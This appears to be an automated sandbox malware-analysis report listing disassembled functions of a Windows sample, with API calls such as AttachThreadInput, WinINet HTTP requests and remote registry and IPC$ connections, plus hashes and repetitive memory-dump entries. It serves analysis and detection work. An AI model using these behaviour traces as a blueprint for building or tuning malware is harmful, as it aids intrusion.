                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                  • API String ID: 1704125052-3381328864
                                                                                                                                                                  • Opcode ID: 1e1b0ab62d55babe5d9dd0b28e3c8fa43b5d3f7e523cc96b106eae1054a64fc4
                                                                                                                                                                  • Instruction ID: b929bac9355886a1964cbfbd839bdad93bed3ab16a42941ec2c15ca37c450a40
                                                                                                                                                                  • Opcode Fuzzy Hash: 1e1b0ab62d55babe5d9dd0b28e3c8fa43b5d3f7e523cc96b106eae1054a64fc4
                                                                                                                                                                  • Instruction Fuzzy Hash: 0511A77E6A8347B9FB042A20EC1ADF677DC9B27768B300022F900A50D2FFA169764954
                                                                                                                                                                  Function 0022B05A Relevance: 15.3, APIs: 10, Instructions: 317COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0022B137
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ArraySafeVartype
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1725837607-0
                                                                                                                                                                  • Opcode ID: e0077003367803dec46b4092739fee7d1cedcd64361925bca5f9dba232a87a8f
                                                                                                                                                                  • Instruction ID: 0d58f5ca0f041d4348c98266b413f35ccae5205be968fd38e0cf6fdc303ff274
                                                                                                                                                                  • Opcode Fuzzy Hash: e0077003367803dec46b4092739fee7d1cedcd64361925bca5f9dba232a87a8f
                                                                                                                                                                  • Instruction Fuzzy Hash: 9CC18E75A1022AEFDB01CF98E485BAEB7F4FF08315F24406AE615E7251C774AA91CB90
                                                                                                                                                                  Function 0020BA66 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • __lock.LIBCMT ref: 0020BA74
                                                                                                                                                                    • Part of subcall function 00208984: __mtinitlocknum.LIBCMT ref: 00208996
                                                                                                                                                                    • Part of subcall function 00208984: RtlEnterCriticalSection.NTDLL(00200127), ref: 002089AF
                                                                                                                                                                  • __calloc_crt.LIBCMT ref: 0020BA85
                                                                                                                                                                    • Part of subcall function 00207616: __calloc_impl.LIBCMT ref: 00207625
                                                                                                                                                                    • Part of subcall function 00207616: Sleep.KERNEL32(00000000,?,00200127,?,001E125D,00000058,?,?), ref: 0020763C
                                                                                                                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 0020BAA0
                                                                                                                                                                  • GetStartupInfoW.KERNEL32(?,00296990,00000064,00206B14,002967D8,00000014), ref: 0020BAF9
                                                                                                                                                                  • __calloc_crt.LIBCMT ref: 0020BB44
                                                                                                                                                                  • GetFileType.KERNEL32(00000001), ref: 0020BB8B
                                                                                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0020BBC4
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1426640281-0
                                                                                                                                                                  • Opcode ID: ed1bc5f6e8e8360a5cb4508858c0cdc822bd325e7823636129351d829506c44c
                                                                                                                                                                  • Instruction ID: c9588e9647a42a164b47fb9bb167751b9205a6bc69bb3c2cf9ced71363c846d9
                                                                                                                                                                  • Opcode Fuzzy Hash: ed1bc5f6e8e8360a5cb4508858c0cdc822bd325e7823636129351d829506c44c
                                                                                                                                                                  • Instruction Fuzzy Hash: 34811A70D243468FDB25CF68D8846ADBBF0AF0A724B24425ED466AB3D2DB749813CF54
                                                                                                                                                                  Function 00224A5B Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00224A7D
                                                                                                                                                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00223AD7,?,00000001), ref: 00224A91
                                                                                                                                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 00224A98
                                                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00223AD7,?,00000001), ref: 00224AA7
                                                                                                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00224AB9
                                                                                                                                                                  • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00223AD7,?,00000001), ref: 00224AD2
                                                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00223AD7,?,00000001), ref: 00224AE4
                                                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00223AD7,?,00000001), ref: 00224B29
                                                                                                                                                                  • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00223AD7,?,00000001), ref: 00224B3E
                                                                                                                                                                  • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00223AD7,?,00000001), ref: 00224B49
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2156557900-0
                                                                                                                                                                  • Opcode ID: c359486483d693706dcc621b135c0be3a1df0d962e39c597d11853b0d0346876
                                                                                                                                                                  • Instruction ID: 62eb2926c7488059cf2178e90702f3e559224b12addb0b7bc999c2e389cc2dac
                                                                                                                                                                  • Opcode Fuzzy Hash: c359486483d693706dcc621b135c0be3a1df0d962e39c597d11853b0d0346876
                                                                                                                                                                  • Instruction Fuzzy Hash: B631DD75A20215BBDB11EF94FC9CB6AB7ADAF55355F108015F904C71A0CBF0EE408BA0
                                                                                                                                                                  Function 0025EC19 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetClientRect.USER32(?), ref: 0025EC32
                                                                                                                                                                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 0025EC49
                                                                                                                                                                  • GetWindowDC.USER32(?), ref: 0025EC55
                                                                                                                                                                  • GetPixel.GDI32(00000000,?,?), ref: 0025EC64
                                                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 0025EC76
                                                                                                                                                                  • GetSysColor.USER32(00000005), ref: 0025EC94
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 272304278-0
                                                                                                                                                                  • Opcode ID: 569d1ccdd4cf4cd4ad6ab6aae1a837566f47f2b6085c80b76bdbb9c90246549a
                                                                                                                                                                  • Instruction ID: 8116367400ec99fb5e065eb598df702f578c06f46f4d83ac00feb5a43363f727
                                                                                                                                                                  • Opcode Fuzzy Hash: 569d1ccdd4cf4cd4ad6ab6aae1a837566f47f2b6085c80b76bdbb9c90246549a
                                                                                                                                                                  • Instruction Fuzzy Hash: 04219D31A00209EFDB21AF64FC4CBA93B75EB05322F518261FA2AA50F1CBB14A50DF11
                                                                                                                                                                  Function 0021D978 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnumChildWindows.USER32(?,0021DD46), ref: 0021DC86
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ChildEnumWindows
                                                                                                                                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                  • API String ID: 3555792229-1603158881
                                                                                                                                                                  • Opcode ID: 9e79bff7ae87169361de90e9a6c61e00685a151cd81c5857f2445dd4d36957c3
                                                                                                                                                                  • Instruction ID: 120941fd0b4e8a93b336a267e34bb82f8128f3d41bb80203783c4df7340c9a1b
                                                                                                                                                                  • Opcode Fuzzy Hash: 9e79bff7ae87169361de90e9a6c61e00685a151cd81c5857f2445dd4d36957c3
                                                                                                                                                                  • Instruction Fuzzy Hash: 3A91A330920A06EBCB08DF64C491BEDF7F5BF24344F54851AD84AA7191DB706AEACBD0
                                                                                                                                                                  Function 001E45A7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 211COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 001E45F0
                                                                                                                                                                  • CoUninitialize.COMBASE ref: 001E4695
                                                                                                                                                                  • UnregisterHotKey.USER32(?), ref: 001E47BD
                                                                                                                                                                  • DestroyWindow.USER32(?), ref: 00255936
                                                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 0025599D
                                                                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 002559CA
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                  • String ID: close all
                                                                                                                                                                  • API String ID: 469580280-3243417748
                                                                                                                                                                  • Opcode ID: 22f837c05257f2837656cb6f266cef2b9f0dbd3ec08448f1a67aeadba93769c3
                                                                                                                                                                  • Instruction ID: 5d0589fccd3719610f79a212c042a1cc88beff68ea1b89cc87b72976ab8694f6
                                                                                                                                                                  • Opcode Fuzzy Hash: 22f837c05257f2837656cb6f266cef2b9f0dbd3ec08448f1a67aeadba93769c3
                                                                                                                                                                  • Instruction Fuzzy Hash: EC916E34610A52CFC719EF15C8A9A6CF3B8FF15705F6142A9F40A97262DB30AD6ACF44
                                                                                                                                                                  Function 001FC24A Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetWindowLongW.USER32(?,000000EB), ref: 001FC2D2
                                                                                                                                                                    • Part of subcall function 001FC697: GetClientRect.USER32(?,?), ref: 001FC6C0
                                                                                                                                                                    • Part of subcall function 001FC697: GetWindowRect.USER32(?,?), ref: 001FC701
                                                                                                                                                                    • Part of subcall function 001FC697: ScreenToClient.USER32(?,?), ref: 001FC729
                                                                                                                                                                  • GetDC.USER32 ref: 0025E006
                                                                                                                                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0025E019
                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0025E027
                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0025E03C
                                                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 0025E044
                                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0025E0CF
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                  • String ID: U
                                                                                                                                                                  • API String ID: 4009187628-3372436214
                                                                                                                                                                  • Opcode ID: 8d68fc2065da8f108d8448f70382546e82c0a319e17b0f96a65ce0d1f15df8ce
                                                                                                                                                                  • Instruction ID: 4a19ed84ea77d46dccd431fe032c3f05fef96302ba2cfd5cb4d360a1d102b21e
                                                                                                                                                                  • Opcode Fuzzy Hash: 8d68fc2065da8f108d8448f70382546e82c0a319e17b0f96a65ce0d1f15df8ce
                                                                                                                                                                  • Instruction Fuzzy Hash: F171353051020EDFCF29CF64C884AFA3BB5FF09362F154269ED566A1A1C7708D69DB90
                                                                                                                                                                  Function 00234C23 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00234C5E
                                                                                                                                                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00234C8A
                                                                                                                                                                  • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00234CCC
                                                                                                                                                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00234CE1
                                                                                                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00234CEE
                                                                                                                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00234D1E
                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00234D65
                                                                                                                                                                    • Part of subcall function 002356A9: GetLastError.KERNEL32(?,?,00234A2B,00000000,00000000,00000001), ref: 002356BE
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1241431887-3916222277
                                                                                                                                                                  • Opcode ID: f6e36c4a4f48f83493716ee10d522f574b5f4a083e8862e4cc202f7c8fb7e0a6
                                                                                                                                                                  • Instruction ID: f8aa97170a18b759fb653eb8078e0d965de61037b240796964f209d894fa3a46
                                                                                                                                                                  • Opcode Fuzzy Hash: f6e36c4a4f48f83493716ee10d522f574b5f4a083e8862e4cc202f7c8fb7e0a6
                                                                                                                                                                  • Instruction Fuzzy Hash: 994190F1A11219BFEB129F60DC89FFA77ACEF08314F108156FA059A151DBB0AD548BA0
                                                                                                                                                                  Function 0021AEE5 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001E7E53: _memmove.LIBCMT ref: 001E7EB9
                                                                                                                                                                  • _memset.LIBCMT ref: 0021AF74
                                                                                                                                                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0021AFA9
                                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0021AFC5
                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0021B00B
                                                                                                                                                                  • CLSIDFromString.COMBASE(?,?), ref: 0021B033
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ConnectConnection2FromQueryRegistryStringValue_memmove_memset
                                                                                                                                                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                  • API String ID: 1159971868-22481851
                                                                                                                                                                  • Opcode ID: 10aaef1f5aa885fc8aaefd94a4510dc9b1a2ba4e2eeb5982e4a51830f5ffab65
                                                                                                                                                                  • Instruction ID: b22ad073a88367f164289f0e5e25a7e10837583e89d7603669fc6c1b15f7f1b4
                                                                                                                                                                  • Opcode Fuzzy Hash: 10aaef1f5aa885fc8aaefd94a4510dc9b1a2ba4e2eeb5982e4a51830f5ffab65
                                                                                                                                                                  • Instruction Fuzzy Hash: 62412976C1062DAADF11EFA5DC959EEB7B8BF28704F004029F811A31A1EB719E15CB90
                                                                                                                                                                  Function 0023BAE6 Relevance: 13.9, APIs: 9, Instructions: 419COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0027DBF0), ref: 0023BBA1
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0027DBF0), ref: 0023BBD5
                                                                                                                                                                  • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0023BD33
                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 0023BD5D
                                                                                                                                                                  • StringFromGUID2.COMBASE(?,?,00000028), ref: 0023BEAD
                                                                                                                                                                  • ProgIDFromCLSID.COMBASE(?,?), ref: 0023BEF7
                                                                                                                                                                  • CoTaskMemFree.COMBASE(?), ref: 0023BF14
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 793797124-0
                                                                                                                                                                  • Opcode ID: e0c703913457cb9de8157f15755af2ff957ad4909652b4fbde96fc88448bcfb1
                                                                                                                                                                  • Instruction ID: 645e35b6ecc3cc5aa852a257ded44621b648a7fe67fc2d47d489b6a08b5888a1
                                                                                                                                                                  • Opcode Fuzzy Hash: e0c703913457cb9de8157f15755af2ff957ad4909652b4fbde96fc88448bcfb1
                                                                                                                                                                  • Instruction Fuzzy Hash: ADF11E75A10109EFCB15DFA4C888EAEB7B9FF89314F108459FA05AB250DB71AE51CF90
                                                                                                                                                                  Function 001FB86E Relevance: 13.7, APIs: 9, Instructions: 170timeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
